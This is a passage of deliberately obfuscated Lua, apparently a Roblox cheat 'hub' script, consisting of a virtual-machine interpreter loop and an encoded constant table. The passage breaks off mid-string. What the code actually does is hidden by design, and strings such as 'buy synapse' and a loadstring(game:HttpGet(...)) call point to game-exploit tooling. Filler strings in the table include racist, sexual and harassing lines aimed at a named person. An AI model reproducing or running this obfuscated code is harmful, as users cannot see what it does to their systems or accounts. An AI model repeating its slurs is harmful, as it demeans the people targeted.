d(4813,6173+o,2698)<1349 then if d(1171,9479+o,1948)>=974 then else if(n[e[l]]==e[a])then u=u+1;else u=e[x];end;end else n[t]=f;if d(5099,7229+o,1298)>649 then else end end end end n[e[l]]=e[x];e=e[o];e=e[o];elseif(f<=r(c(608607877,887543087),c(913421146,914282342)))then local l=e[l];local x=n[e[x]];n[l+1]=x;n[l]=x[e[a]];end;elseif(f==((h[840749076])or(d[654677504](c(791003313,d[685495299]),c,h,840749076))))then e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];local f;local s;local r;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and-n or n)or c*n)%l return c end for o=2,29 do if d(9826,6915+o,3894)<=1947 then if d(8180,5267+o,548)<=274 then if d(7520,3998+o,3344)>=1672 then s=e[x];else end else if d(3335,4540+o,2732)>=1366 then else r=e[f];end end else if d(1192,2713+o,3932)>1966 then if d(5782,4408+o,2488)>1244 then else end else if d(7778,2518+o,2600)>1300 then f=l;else n[r]=s;end end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local s;local f;local r;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and-n or n)or c*n)%l return c end for o=2,33 do if d(4088,9564+o,690)<=345 then if d(6215,3500+o,3968)>=1984 then if d(6415,1572+o,2482)<1241 then else end else if d(7042,8099+o,1842)>921 then r=e[s];else end end n[r]=f;else s=l;if d(5018,5774+o,3224)>1612 then if d(7395,1671+o,3140)>1570 then n[e[l]]=#n[e[x]];else end else if d(1301,6999+o,2784)<=1392 then f=e[x];else end end end end n[e[l]]=e[x];e=e[o];local s;local r;local f;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for o=2,28 do if d(4027,4107+o,3830)>=1915 then if d(6754,5218+o,3756)>1878 then s=l;if d(6471,2234+o,2204)<=1102 then r=e[x];else end else if d(1678,7874+o,3492)>=1746 then else end end else if d(5252,5250+o,2936)>1468 then if d(3901,4977+o,3262)<=1631 then else end else if d(1988,6499+o,1472)<736 then else f=e[s];end n[f]=r;end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];n[e[l]][e[x]]=n[e[a]];e=e[o];n[e[l]]=A[e[x]];e=e[o];local c=e[l];local d=n[e[x]];n[c+1]=d;n[c]=d[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local l=e[l];n[l](i(n,l+1,e[x]));for e=l+1,t do n[e]=nil;end;e=e[o];e=e[o];elseif(f<=r(c(1018406305,d[998158507]),883897))then local e=e[l];b=e+E-1;for l=0,E do n[e+l]=B[l];end;for e=b+1,t do n[e]=nil;end;end;elseif(f<=r(c(1061823964,d[283445478]),c(471336802,470283404)))then if(f==r(c(742484637,d[81357792]),c(491157543,492909007)))then n[e[l]]=w(256);elseif(f<=c(343362290,d.YAA66F))then n[e[l]]=w(e[x]);e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local f;local c;local t;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((e<2)and n or-n)or a*n)%l return a end for o=2,30 do if d(1261,1484+o,856)>428 then if d(6631,1855+o,3466)<1733 then if d(6124,5924+o,3312)<1656 then n[e[l]]=s[e[x]];else n[e[l]]=#n[e[x]];end else if d(4736,4404+o,1862)>=931 then f=l;else c=e[x];end end else if d(1235,1199+o,2780)>1390 then if d(8203,8962+o,322)>161 then t=e[f];else end else n[t]=c;if d(9155,1253+o,1268)>=634 then else end end end end local t;local f;local c;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((1==e)and-n or n)or a*n)%l return a end for o=0,25 do if d(3373,1036+o,1392)<=696 then t=l;if d(8802,3145+o,2578)<1289 then if d(7336,9874+o,2902)>1451 then else f=e[x];end else if d(6530,6565+o,2762)>1381 then c=e[t];else end end else n[c]=f;if d(4588,2273+o,1082)>=541 then if d(7445,7684+o,3398)>=1699 then else end else if d(4438,5241+o,1252)>626 then else end end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local c;local t;local f;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((1==e)and-n or n)or a*n)%l return a end for o=1,29 do if d(7202,5004+o,1272)<636 then if d(1237,1815+o,2812)<1406 then if d(2372,7200+o,3336)>=1668 then else end else if d(4956,7530+o,2304)<1152 then n[f]=t;else t=e[x];end end else if d(5342,9682+o,2074)<=1037 then if d(3755,2937+o,980)<490 then c=l;else f=e[c];end else if d(1809,3819+o,3360)<=1680 then else end end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];e=e[o];end;elseif(f==r(c(258541792,d[81357792]),c(410149657,410847056)))then local r;local i;local c;local d=0;local f=0;local function o(n,e,l)e=(d+e)%3 d=((e~=0)and d+((e<2)and n or-n)or d*n)%l return d end for d=1,33 do if o(9883,4834+d,3392)>=1696 then if f>-1 then n[c](n[1+c]);f=-1 end;if o(1433,7745+d,420)<210 then if o(8949,1729+d,2266)>=1133 then n[e[l]]=#n[e[x]];else if f==-1 then for e=c,t do n[e]=nil;end;f=-2 end;end else if o(9569,8732+d,3752)>=1876 then else n[e[l]]=e[x]-e[a];end end else if o(4526,9466+d,2938)>1469 then if o(5050,2147+d,2680)<1340 then r=l;else end i=e;else if o(3621,6739+d,1742)>871 then else c=i[r];end end end end elseif(f<=44)then local e=e[l];n[e]=n[e](i(n,e+1,b));for e=e+1,b do n[e]=nil;end;end;elseif(f<=c(434604312,434604331))then if(f<=c(106951579,d[998158507]))then if(f<=r(c(846914761,d[81357792]),1092925))then n[e[l]]=A[e[x]];elseif(f==((h[620086519])or((function(e)h[620086519]=(c(c(e,116243),707349))-902962;return(h[620086519]);end)(c(49551750,d[307465418])))))then do return;end;elseif(f<=r(864561623,2574822))then e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local f;local r;local h;local c=0;local function d(e,n,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and n or-n)or c*n)%l return c end for o=2,34 do if d(7123,7417+o,3608)>1804 then if d(2382,7255+o,388)<=194 then if d(5089,5141+o,734)<=367 then else n[e[l]]=s[e[x]];end else if d(5709,1368+o,3440)>1720 then else end end else f=l;if d(8608,8199+o,2852)<1426 then n[h]=r;if d(5758,9926+o,3504)<1752 then else end else if d(2919,4186+o,2832)<1416 then r=e[x];else n[e[l]]=#n[e[x]];end h=e[f];end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];n[e[l]][e[x]]=n[e[a]];e=e[o];n[e[l]]=A[e[x]];e=e[o];local c=e[l];local d=n[e[x]];n[c+1]=d;n[c]=d[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local l=e[l];n[l](i(n,l+1,e[x]));for e=l+1,t do n[e]=nil;end;e=e[o];e=e[o];end;elseif(f<=c(49468369,d[307465418]))then if(f>r(c(504491036,64668779),c(576250380,d[250892586])))then n[e[l]]=n[e[x]];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];n[e[l]]=s[e[x]];e=e[o];local E;local A;local h;local f;local r;local c=0;local function d(e,n,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and-n or n)or c*n)%l return c end for o=1,25 do if d(5480,4403+o,2870)<1435 then if d(4563,5475+o,2402)<=1201 then if d(9304,5678+o,3074)>=1537 then if(e[l]~=e[a])then u=u+1;else u=e[x];end;else r=e[A];end n[r]=f;else if d(2295,4386+o,1592)>796 then h=e[x];else f=E[h];end end else if d(4959,2024+o,1334)<667 then if d(5142,4417+o,1034)<517 then else end else if d(8501,9242+o,1394)<=697 then E=s;else end A=l;end end end local c=e[l];local d=n[e[x]];n[c+1]=d;n[c]=d[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];local f,c=y(n[d](i(n,d+1,e[x])));b=c+d-1;local c=0;for e=d,b do c=c+1;n[e]=f[c];end;e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,b));for e=d+1,b do n[e]=nil;end;e=e[o];local d=e[l];n[d]=n[d]();e=e[o];local c=e[l];local d=n[e[x]];n[c+1]=d;n[c]=d[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local f;local r;local h;local c=0;local function d(e,n,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for o=2,32 do if d(8386,9488+o,2340)>1170 then if d(3110,1157+o,918)<=459 then if d(1847,1696+o,1532)<=766 then else end else if d(4099,1968+o,2768)<=1384 then else n[h]=r;end end else if d(8120,4152+o,2214)>=1107 then if d(7822,9202+o,1518)>=759 then f=l;else end else if d(7774,9258+o,1610)>805 then r=e[x];else end h=e[f];end end end local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];local c=e[l];local d=n[e[x]];n[c+1]=d;n[c]=d[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];local c=e[l];local d=n[e[x]];n[c+1]=d;n[c]=d[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];e=e[o];elseif(f<c(479595120,479595073))then e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local s;local f;local r;local c=0;local function d(e,n,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and-n or n)or c*n)%l return c end for o=0,25 do if d(9103,5132+o,3924)<=1962 then r=e[s];if d(8387,3972+o,1558)>779 then n[r]=f;if d(8459,5101+o,2274)>1137 then else end else if d(7606,1660+o,2736)>1368 then else end end else if d(5437,7128+o,250)<125 then if d(7586,8087+o,1480)<740 then else s=l;end else if d(2822,7395+o,3664)<=1832 then else end end f=e[x];end end n[e[l]]=e[x];e=e[o];local s;local r;local f;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and-n or n)or c*n)%l return c end for o=0,28 do if d(2868,4934+o,3758)<=1879 then if d(6593,4095+o,230)>=115 then if d(5895,7610+o,1096)<548 then else end else if d(5334,8740+o,3964)>=1982 then else end end else if d(7670,8565+o,3376)<1688 then if d(4357,4581+o,1232)>=616 then else end else if d(6988,9970+o,2002)>1001 then s=l;else n[f]=r;end r=e[x];end f=e[s];end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local s;local r;local f;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and-n or n)or c*n)%l return c end for o=2,28 do if d(6041,2319+o,586)<=293 then if d(5265,7476+o,2800)<=1400 then if d(2761,2989+o,1514)>=757 then else s=l;end else if d(3133,3416+o,3864)>=1932 then else r=e[x];end end else if d(3025,5899+o,1000)>500 then if d(1044,5409+o,1872)<936 then local o=e[x];local x=n[o];for e=o+1,e[a]do x=x..n[e];end;n[e[l]]=x;else f=e[s];end n[f]=r;else if d(9678,1217+o,1446)>723 then else end end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];n[e[l]][e[x]]=n[e[a]];e=e[o];n[e[l]]=A[e[x]];e=e[o];local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local l=e[l];n[l](i(n,l+1,e[x]));for e=l+1,t do n[e]=nil;end;e=e[o];e=e[o];end;elseif(f>50)then local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];e=e[o];elseif(f<((h[860999017])or((function(e)h[860999017]=(((e)-192082)-661889)-877968;return(h[860999017]);end)(c(999573105,999173095)))))then local l=e[l];n[l]=n[l](i(n,l+1,e[x]));for e=l+1,t do n[e]=nil;end;end;elseif(f<=c(180089996,d[932522712]))then if(f<=r(c(215432593,d[257441174]),1092901))then if(f>52)then n[e[l]][e[x]]=e[a];elseif(f<r(c(478260196,d[685495299]),c(258501856,d[203450867])))then local e=e[l];n[e]=n[e]();end;elseif(f>r(c(475575775,837489244),c(574893328,d[250892586])))then local l=e[l];n[l](i(n,l+1,e[x]));for e=l+1,t do n[e]=nil;end;elseif(f<55)then n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local i;local f;local t;local c=0;local function d(e,n,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and-n or n)or c*n)%l return c end for o=1,29 do if d(2020,6298+o,702)<351 then if d(2146,3888+o,2678)>1339 then if d(9545,3408+o,264)<132 then else end else if d(7090,2358+o,3042)>=1521 then i=l;else end f=e[x];end else if d(1496,4994+o,3010)>=1505 then if d(6410,8369+o,3412)>1706 then n[e[l]]=#n[e[x]];else t=e[i];end else if d(5264,3489+o,3008)>=1504 then n[e[l]]=s[e[x]];else end end n[t]=f;end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local i;local t;local f;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for o=1,31 do if d(3646,2242+o,1372)>=686 then if d(8254,7090+o,2822)<1411 then if d(8522,4849+o,3924)<=1962 then else n[f]=t;end else if d(7917,2446+o,3230)>=1615 then else end end else i=l;if d(9123,3636+o,3742)>1871 then if d(9512,8422+o,1962)>=981 then t=e[x];else end f=e[i];else if d(7505,6257+o,2484)>1242 then else end end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local i;local t;local f;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and-n or n)or c*n)%l return c end for o=1,33 do if d(9723,2564+o,1372)>=686 then f=e[i];if d(1561,3524+o,2218)>=1109 then if d(1277,8935+o,520)>260 then n[f]=t;else end else if d(5959,9789+o,2738)>=1369 then else n[e[l]]=e[x]-e[a];end end else if d(7574,9800+o,3888)>=1944 then if d(1793,6394+o,270)>=135 then else end else if d(9140,8150+o,1822)<=911 then i=l;else end t=e[x];end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];e=e[o];end;elseif(f<=r(c(409505745,919306401),2447356))then if(f>((h[728321506])or(d[642983219](c(682839197,680984836),c,h,728321506))))then e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local f;local r;local s;local c=0;local function d(e,n,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and-n or n)or c*n)%l return c end for o=0,26 do if d(8668,7090+o,1936)>=968 then if d(2687,1895+o,3040)>=1520 then n[s]=r;if d(5810,3747+o,842)<=421 then else end else if d(8782,8695+o,456)>=228 then s=e[f];else end end else f=l;if d(6786,7243+o,312)<156 then if d(9088,9325+o,3716)>=1858 then r=e[x];else end else if d(1515,7617+o,3050)>1525 then else end end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];n[e[l]][e[x]]=n[e[a]];e=e[o];n[e[l]]=A[e[x]];e=e[o];local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local l=e[l];n[l](i(n,l+1,e[x]));for e=l+1,t do n[e]=nil;end;e=e[o];e=e[o];elseif(f<r(c(885152293,d.YAA66F),c(567915168,568246524)))then n[e[l]]=C(F[e[x]],(nil),s);end;elseif(f==r(548737277,488025))then local c=F[e[x]];local d=e[g];local x={};local o=W({},{__index=function(n,e)local e=x[e];return(e[1][e[2]]);end,__newindex=function(l,e,n)local e=x[e];e[1][e[2]]=n;end;});for e=1,e[a],1 do local l=d[e];if(l[0]==0)then x[e-1]=({n,l[1]});else x[e-1]=({A,l[1]});end;m[#m+1]=x;end;n[e[l]]=C(c,o,s);elseif(f<=r(499853431,811571))then local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];local c=e[l];local d=n[e[x]];n[c+1]=d;n[c]=d[e[a]];e=e[o];local d=e[l];n[d](n[1+d]);for e=d,t do n[e]=nil;end;e=e[o];local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];local s;local f;local r;local c=0;local function d(e,n,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and-n or n)or c*n)%l return c end for o=1,26 do if d(2074,6160+o,1992)>=996 then if d(1669,8413+o,1934)>=967 then if d(5455,6228+o,1176)>=588 then n[e[l]]=n[e[x]]+e[a];else end else if d(9334,9288+o,266)>133 then else s=l;end end else f=e[x];if d(7519,9497+o,2134)>1067 then r=e[s];if d(7994,2040+o,1678)>=839 then else n[r]=f;end else if d(3155,3872+o,872)>436 then if(n[e[l]]==e[a])then u=u+1;else u=e[x];end;else end end end end local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];e=e[o];end;until false end);end;return C(X(),{},M())(...);end)(({[((114931272-#("Elysium owns me and all")))]=(((#{790;254;120;563;(function(...)return 960;end)()}+182208397)));[((#{}+385270595))]=("\108");[(623506417)]=(((47-#("stop doxxing me -jason jackson tanson"))));[((#{290;538;}+654677502))]=((function(x,e,l,n)l[n]=e(e(((e(x,(978926)))-(822300))-((718537-#("selfbot:"))),(704915)),((#{390;423;915;(function(...)return 814,175,...;end)(421,14,522,258)}+125746)));return(l[n]);end));[(518477528)]=("\35");[(685495299)]=(((#{}+789152307)));[(84277809)]=((9));[((#{128;(function(...)return 123,877,86,...;end)(406,941,807)}+190869577))]=("\107");[((540715612-#("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")))]=(((553-#("buy synapse"))));["DZV9R"]=((31));[(125395511)]=((41744));[(81883734)]=((590980695));[(168487377)]=((476648683));[((334855230-#("perth say hi")))]=((89447717));[((#{662;952;67;}+545073711))]=("\100");[((#{172;}+877333206))]=("\116");[((57646304-#("perth is cool")))]=((21));[(733024102)]=(((114-#("blacks suck"))));[((#{977;(function(...)return 383,679,783;end)()}+153990743))]=((5));TkA8BDwk=((345));[(448203909)]=((796));[(593684006)]=((5000));[((#{159;280;317;364;(function(...)return 42,588,765,543,...;end)()}+749996484))]=((function(x,e,n,l)n[l]=e(e((e(x,(645304)))-((#{}+147061)),((#{488;914;376;(function(...)return 306,322,685,490;end)()}+113954))),(311543));return(n[l]);end));[((852719106-#("Hehe you can try to read this but...")))]=(((#{}+44969)));["YAA66F"]=((343362264));['dB5cI']=(((#{93;259;107;}+73069129)));YYLFDt9Fo=(((351457000-#("It is sad that most meme strings are only at the bottoms of the script"))));[(803881231)]=((384253));[((#{212;769;991;330;}+532727314))]=((565279642));[(139271856)]=(((176-#("Overdrive is a skill based fighting game! Better than UCD or Soulshatters."))));[((480434885-#("psu stealing meme strings")))]=((1));J0YMudhl0L=((8));['VESf4zl']=("\119");["kdry1qPA"]=("\117");[((#{380;863;308;246;(function(...)return 130,867,859,594,...;end)(100)}+203450858))]=(((#{823;298;}+256845058)));["Xww6et6v"]=(((#{179;}+877333206)));[(576117043)]=(((#{408;636;902;}+385270592)));[(943807356)]=((182136771));[(140359578)]=((282638888));["luaLe9ia"]=((8816));[(157867208)]=(((#{}+4580)));[(820216903)]=((190869584));[(65814084)]=("\102");[((960565334-#("perth say hi")))]=(((19-#("Chicken butt"))));[((#{576;}+81357791))]=((533283658));Nk6XBVv1Ps=((234));[(345057816)]=("\118");[(971311728)]=(((#{323;797;570;663;}+16777212)));[(297664171)]=((2047));[(283769844)]=((117));qYEqVwYq=(((461849726-#("Nasty creampie anime girls - perth, 2021"))));[(984576513)]=((function(x,l,n,e)n[e]=((l(l(x,((593308-#("Kanye, white COVID balls, Danny Balls, I like eatin my mom, COVID-19 Balls, Fortnite Balls, EDP is my friend, Trump big balls, COVID Balls cannot- every little girl is a... CANDICE!, Levi, Club Penguin, sussy wet, Joe Biden, yeah-, Cam-cam, I like eatin my mom out, JX Cheeseburger balls")))),((227210-#("I am a registered sex offender i stuck mt dick into a blender, your mom is a transgender")))))-(63587))-(480186);return(n[e]);end));[(431083945)]=(((467339988-#("loadstring(game:HttpGet(https:discord.com::invite::fortnite),true){}"))));[(283445478)]=((679970794));[(826633082)]=("\104");[((#{}+568107060))]=("\40");[(941759917)]=("\97");[((883095599-#("buy strawberry hub")))]=((545073714));[((#{396;}+742554851))]=(((40-#("p-pwease erp with me"))));["PNDZgira"]=(((#{133;894;(function(...)return...;end)(936,604)}+15775)));[(273720328)]=((747552830));C9t1IkCl=("\58");[((#{477;810;400;}+748584653))]=(((#{62;277;867;}+504173012)));[((#{240;(function(...)return 285,879,447,927;end)()}+131841269))]=(((38-#("when will perth fall down stairs"))));[((711042151-#("Snacks")))]=(((#{732;121;643;(function(...)return 658,736,96,771;end)()}+885997)));[(115430017)]=((function(x,l,n,e)n[e]=((l(l(x,((296253-#("01101000 01100101 01101100 01101100 01101111 00100000 01110000 01100101 01110010 01110100 01101000 01110011 00100000 01100010 01100001 01101100 01101100 01110011 00100000 01110011 01101101 01100101 01101100 01101100")))),((#{763;487;826;808;}+14057))))-((132224-#("waht the fuck"))))-(325710);return(n[e]);end));[((#{93;(function(...)return;end)()}+565279641))]=("\98");[((958828669-#("rip qoto x :(")))]=((0));[((#{}+307465418))]=((49468384));[(450985801)]=(((310-#("strawberrys is a n-n-n-n-nn-n-n-n-n-n-n-n-nnn-n-n-n- i"))));[(619472834)]=(((#{88;710;507;602;(function(...)return 960,402,501,...;end)()}+1016)));[(247135657)]=("\114");['hwyBAxcsy']=((function(x,l,e,n)e[n]=(((l(x,(986493)))-(112892))-(112258))-((#{349;995;454;260;(function(...)return;end)()}+769746));return(e[n]);end));[(504173015)]=("\37");[((#{445;187;227;}+793463599))]=((function(x,e,l,n)l[n]=(e(e(e((x)-(657355),((#{}+162369))),(558675)),((#{704;611;382;994;(function(...)return 519,694,995;end)()}+848078))))-((647203-#("StrawberryHub")));return(l[n]);end));['BhLIjsO7R']=((32));[(918797337)]=(((89-#("buy synapse"))));[(642983219)]=((function(x,l,n,e)n[e]=(l((l((x)-(305671),((#{665;388;}+525750))))-(804541),(822105)))-(513020);return(n[e]);end));[(560899512)]=(((219-#("strawberrys is a n-n-n-n-nn-n-n-n-n-n-n-n-nnn-n-n-n- i"))));[((#{838;(function(...)return 527,416,613,266,...;end)(355)}+434775788))]=("\109");[((870664672-#("Absolute penis slayer")))]=((568107060));[((#{941;301;930;}+167002731))]=(((#{923;943;}+886)));[(461849686)]=("\112");[((266525204-#("Hehe you can try to read this but...")))]=((444));[(998158507)]=(((#{}+106951604)));['QfrNfGpk']=((523));[((#{14;271;592;544;(function(...)return;end)()}+909102311))]=(((12-#("GaySense?"))));[(212276199)]=((function(l,x,n,e)n[e]=(((l)-((#{15;472;123;168;}+438997)))-(841422))-(297207);return(n[e]);end));[((932522763-#("is that a password protected homework folder i see?")))]=(((180090311-#("Please DO NOT buy the BTS meal if you dont stan them. You are preventing the actual BTS fans who have waited for months from having the BTS meal experience. Eating the sauces without understanding their significance is literally cultural appropriation and its not okay"))));[(755710076)]=(((#{408;}+522620844)));[((89447725-#("Cnncnfnc")))]=("\101");[(105926487)]=(((941759937-#("p-pwease erp with me"))));[(119983808)]=((826633082));['eZtWPM']=((836734713));[(661139228)]=((434775794));r4x0mp=((757512686));[(522620845)]=("\43");[((#{75;778;269;256;}+476648679))]=("\99");[(92522146)]=(((#{9;(function(...)return 214;end)()}+579797)));["znBHRjlwJN"]=("\110");[((#{(function(...)return 877,335,535;end)()}+275182578))]=((4));[((841330834-#("garfield loves cock")))]=((750739688));['MXxT5eJPl']=((872859779));["kxIH4lS37o"]=("\111");[((351456933-#("bro")))]=("\51");[(530907681)]=(((#{362;339;99;(function(...)return;end)()}+65533)));[(152097731)]=(((1069-#("Powered By Femboy Magic"))));["NtyxXBO3AE"]=((518477528));[((543799796-#("I forgot streamreader.Close() LMAO")))]=((36));[((540556189-#("apply for snoops scpf")))]=("\121");[((467339932-#("perth is fat")))]=("\50");[(469071920)]=((65814084));['k9F1fT']=(((225-#("are you trying to manually constant dump?"))));[((356085757-#("perth")))]=(((#{}+26861)));[(372297710)]=(((345057865-#("Hey, i won the giveaway. Could i redeem my prize?"))));['kmQESjn']=("\120");[(836734713)]=("\115");[(584781907)]=(((#{100;}+557)));[((270656840-#("This obfuscated script was sponsored by Free 